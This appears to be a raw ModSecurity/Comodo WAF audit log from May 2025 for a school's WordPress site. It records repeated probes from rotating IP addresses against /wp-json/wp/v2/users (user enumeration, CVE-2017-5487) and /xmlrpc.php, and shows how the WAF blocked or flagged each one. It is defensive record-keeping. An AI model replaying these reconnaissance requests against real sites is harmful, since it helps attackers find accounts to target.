Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --850fed58-Z-- --4e736343-A-- [17/May/2025:04:42:32 +0700] aCexSBKi5m5upc8uMd6eKAAAANI 103.236.140.4 56076 103.236.140.4 8181 --4e736343-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.37.14 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.37.14 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4e736343-C-- demo.sayHello --4e736343-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4e736343-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747431752421908 5605 (- - -) Stopwatch2: 1747431752421908 5605; combined=4098, p1=557, p2=3267, p3=27, p4=25, p5=129, sr=104, sw=93, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4e736343-Z-- --fd4cc93a-A-- [17/May/2025:04:42:38 +0700] aCexThKi5m5upc8uMd6eKgAAANQ 103.236.140.4 56088 103.236.140.4 8181 --fd4cc93a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.161.199 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.161.199 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --fd4cc93a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fd4cc93a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747431758394635 3080 (- - -) Stopwatch2: 1747431758394635 3080; combined=1323, p1=473, p2=820, p3=0, p4=0, p5=30, sr=118, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fd4cc93a-Z-- --5748016e-A-- [17/May/2025:04:42:43 +0700] aCexU3yxdQCiyU1ENFciKQAAABQ 103.236.140.4 56092 103.236.140.4 8181 --5748016e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.161.199 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.161.199 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --5748016e-C-- demo.sayHello --5748016e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --5748016e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747431763434796 5981 (- - -) Stopwatch2: 1747431763434796 5981; combined=4322, p1=583, p2=3506, p3=34, p4=66, p5=82, sr=79, sw=51, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5748016e-Z-- --95f8417c-A-- [17/May/2025:04:45:07 +0700] aCex43yxdQCiyU1ENFciLAAAAAA 103.236.140.4 56124 103.236.140.4 8181 --95f8417c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.118.106 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.118.106 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --95f8417c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --95f8417c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747431907284311 2705 (- - -) Stopwatch2: 1747431907284311 2705; combined=1115, p1=368, p2=724, p3=0, p4=0, p5=23, sr=57, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --95f8417c-Z-- --fb34ad36-A-- [17/May/2025:04:45:13 +0700] aCex6QTOsBn9MSWb6WJp_wAAAJM 103.236.140.4 56128 103.236.140.4 8181 --fb34ad36-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.118.106 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.118.106 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --fb34ad36-C-- demo.sayHello --fb34ad36-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --fb34ad36-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747431913548839 5259 (- - -) Stopwatch2: 1747431913548839 5259; combined=3898, p1=515, p2=3167, p3=23, p4=25, p5=97, sr=80, sw=71, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fb34ad36-Z-- --b6c90f4e-A-- [17/May/2025:04:46:17 +0700] aCeyKXyxdQCiyU1ENFciLwAAAAU 103.236.140.4 56132 103.236.140.4 8181 --b6c90f4e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.91.200 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.91.200 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b6c90f4e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b6c90f4e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747431977188342 3354 (- - -) Stopwatch2: 1747431977188342 3354; combined=1418, p1=484, p2=901, p3=0, p4=0, p5=33, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b6c90f4e-Z-- --a1b32727-A-- [17/May/2025:04:46:23 +0700] aCeyL-m4kjNN-hEbWjI8UwAAAFQ 103.236.140.4 56136 103.236.140.4 8181 --a1b32727-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.91.200 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.91.200 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a1b32727-C-- demo.sayHello --a1b32727-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a1b32727-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747431983877688 5352 (- - -) Stopwatch2: 1747431983877688 5352; combined=4061, p1=569, p2=3262, p3=22, p4=25, p5=105, sr=109, sw=78, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a1b32727-Z-- --b72f3904-A-- [17/May/2025:04:48:06 +0700] aCeylgTOsBn9MSWb6WJqAQAAAJY 103.236.140.4 56158 103.236.140.4 8181 --b72f3904-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.85.248 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.85.248 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b72f3904-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b72f3904-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747432086050750 3609 (- - -) Stopwatch2: 1747432086050750 3609; combined=1570, p1=574, p2=956, p3=0, p4=0, p5=40, sr=142, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b72f3904-Z-- --d102a00a-A-- [17/May/2025:04:48:10 +0700] aCeymgTOsBn9MSWb6WJqAwAAAJg 103.236.140.4 56162 103.236.140.4 8181 --d102a00a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.85.248 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.85.248 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d102a00a-C-- demo.sayHello --d102a00a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d102a00a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747432090559885 5723 (- - -) Stopwatch2: 1747432090559885 5723; combined=4216, p1=625, p2=3348, p3=33, p4=30, p5=109, sr=157, sw=71, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d102a00a-Z-- --15c03260-A-- [17/May/2025:04:55:32 +0700] aCe0VATOsBn9MSWb6WJqBwAAAIg 103.236.140.4 56232 103.236.140.4 8181 --15c03260-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.86.198 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.86.198 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --15c03260-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --15c03260-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747432532362091 3129 (- - -) Stopwatch2: 1747432532362091 3129; combined=1353, p1=447, p2=877, p3=0, p4=0, p5=29, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --15c03260-Z-- --76d37a40-A-- [17/May/2025:04:55:36 +0700] aCe0WOm4kjNN-hEbWjI8XAAAAEo 103.236.140.4 56238 103.236.140.4 8181 --76d37a40-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.178.255 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.178.255 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --76d37a40-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --76d37a40-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747432536530613 2839 (- - -) Stopwatch2: 1747432536530613 2839; combined=1242, p1=426, p2=786, p3=0, p4=0, p5=30, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --76d37a40-Z-- --5362ec38-A-- [17/May/2025:04:55:37 +0700] aCe0WXyxdQCiyU1ENFciOQAAABM 103.236.140.4 56240 103.236.140.4 8181 --5362ec38-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.86.198 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.86.198 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --5362ec38-C-- demo.sayHello --5362ec38-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --5362ec38-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747432537897677 5205 (- - -) Stopwatch2: 1747432537897677 5205; combined=3993, p1=440, p2=3321, p3=35, p4=34, p5=94, sr=67, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5362ec38-Z-- --1b2efc2a-A-- [17/May/2025:04:55:40 +0700] aCe0XHyxdQCiyU1ENFciOwAAABY 103.236.140.4 56246 103.236.140.4 8181 --1b2efc2a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.178.255 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.178.255 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --1b2efc2a-C-- demo.sayHello --1b2efc2a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --1b2efc2a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747432540607492 6403 (- - -) Stopwatch2: 1747432540607492 6403; combined=4588, p1=581, p2=3769, p3=39, p4=42, p5=94, sr=78, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1b2efc2a-Z-- --f29da640-A-- [17/May/2025:04:55:59 +0700] aCe0bwTOsBn9MSWb6WJqCgAAAIw 103.236.140.4 56254 103.236.140.4 8181 --f29da640-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.109.87 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.109.87 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f29da640-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f29da640-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747432559054618 3421 (- - -) Stopwatch2: 1747432559054618 3421; combined=1458, p1=482, p2=944, p3=0, p4=0, p5=32, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f29da640-Z-- --58f0e33d-A-- [17/May/2025:04:56:05 +0700] aCe0dem4kjNN-hEbWjI8XgAAAEw 103.236.140.4 56258 103.236.140.4 8181 --58f0e33d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.109.87 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.109.87 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --58f0e33d-C-- demo.sayHello --58f0e33d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --58f0e33d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747432565922265 6684 (- - -) Stopwatch2: 1747432565922265 6684; combined=4650, p1=634, p2=3774, p3=32, p4=35, p5=102, sr=99, sw=73, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --58f0e33d-Z-- --3a4e7843-A-- [17/May/2025:04:58:59 +0700] aCe1IxKi5m5upc8uMd6eNgAAAM8 103.236.140.4 56266 103.236.140.4 8181 --3a4e7843-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.83.209 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.83.209 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3a4e7843-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3a4e7843-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747432739877993 3361 (- - -) Stopwatch2: 1747432739877993 3361; combined=1379, p1=510, p2=840, p3=0, p4=0, p5=29, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3a4e7843-Z-- --51337719-A-- [17/May/2025:04:59:04 +0700] aCe1KBKi5m5upc8uMd6eOAAAANE 103.236.140.4 56270 103.236.140.4 8181 --51337719-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.83.209 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.83.209 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --51337719-C-- demo.sayHello --51337719-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --51337719-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file 